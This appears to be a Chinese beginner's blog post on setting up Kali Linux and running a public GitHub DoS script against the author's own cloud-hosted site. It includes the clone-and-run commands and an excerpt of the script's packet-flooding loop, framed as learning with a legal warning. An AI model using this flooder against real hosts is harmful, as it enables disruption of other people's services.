对自己的博客网站进行DOS攻击

对自己的博客网站进行DOS攻击

先说明一点,别对别人的网站进行ddos/dos攻击(dos攻击一般短时间攻击不下来),这是违法的,很多都有自动报警机制,本篇博客仅用于学习,请勿用于非法用途

安装kaili Linux

进入KALI官网,下载iso镜像文件

vmware新建虚拟机,选择自定义

点击下一步

点击下一步

点击下一步

选择稍后安装操作系统,点击下一步

选择Debian系统,版本根据自己的kali版本来,我这里就选最新的Debian12,点击下一步

虚拟机名称和存储位置根据自己情况来,点击下一步

处理器配置根据自己电脑的配置来,点击下一步

内存也是根据自己的使用情况来,点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击自定义硬件

导入下载好的ISO文件,关闭后点击完成即可

剩下启动后的配置就比较简单了,根据自己情况来即可

安装完成后打开是这样的:

换源+更新

进入root权限

shell 复制代码
sudo su

输入密码后,换源

shell 复制代码
sudo vim /etc/apt/sources.list

部分国内源:

shell 复制代码
官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
东软大学
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
重庆大学
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

自己选一个换上就行,然后进行更新:

shell 复制代码
sudo apt-get update
DOS攻击

未被攻击前访问我的网站是这样的:

下载Dos数据包

shell 复制代码
git clone https://github.com/Andysun06/ddos

进入ddos文件夹

shell 复制代码
cd ddos

执行python脚本

shell 复制代码
python ddos-p3.py

下面这两张用的是别人的图,不想打码了(雾

反正我攻击了大概8分钟,网站还是可以正常访问的,由于阿里云服务器有一定量的免费的cdn防护,我个人进行DOS攻击至少需要一小时才能耗完.这次只是实验一下,所以就不继续了.

我们可以看到受到攻击后服务器的带宽是有被大量消耗的,说明我们的攻击是有效的.

代码分析

去作者的github上把代码拉下来,看看是怎么写的:

python 复制代码
os.system("clear")
os.system("figlet DDos Attack")
ip = input("请输入 IP     : ")
port = int(input("攻击端口      : "))
sd = int(input("攻击速度(1~1000) : "))

os.system("clear")

sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     print ("已发送 %s 个数据包到 %s 端口 %d"%(sent,ip,port))
     time.sleep((1000-sd)/2000)

核心代码就这么几行,其实就是不断向指定IP的端口发送数据包,然后打印发送数据包的个数.

本人也是初入安全的小白,有什么不对的地方欢迎在评论区指出

相关推荐
萨格拉斯救世主26 分钟前
戴尔R930服务器增加 Intel X710-DA2双万兆光口含模块
运维·服务器
无所谓จุ๊บ27 分钟前
树莓派开发相关知识十 -小试服务器
服务器·网络·树莓派
Jtti28 分钟前
Windows系统服务器怎么设置远程连接?详细步骤
运维·服务器·windows
TeYiToKu32 分钟前
笔记整理—linux驱动开发部分(9)framebuffer驱动框架
linux·c语言·arm开发·驱动开发·笔记·嵌入式硬件·arm
dsywws34 分钟前
Linux学习笔记之时间日期和查找和解压缩指令
linux·笔记·学习
道法自然040235 分钟前
Ethernet 系列(8)-- 基础学习::ARP
网络·学习·智能路由器
yeyuningzi42 分钟前
Debian 12环境里部署nginx步骤记录
linux·运维·服务器
上辈子杀猪这辈子学IT1 小时前
【Zookeeper集群搭建】安装zookeeper、zookeeper集群配置、zookeeper启动与关闭、zookeeper的shell命令操作
linux·hadoop·zookeeper·centos·debian
minihuabei1 小时前
linux centos 安装redis
linux·redis·centos
EasyCVR1 小时前
萤石设备视频接入平台EasyCVR多品牌摄像机视频平台海康ehome平台(ISUP)接入EasyCVR不在线如何排查?
运维·服务器·网络·人工智能·ffmpeg·音视频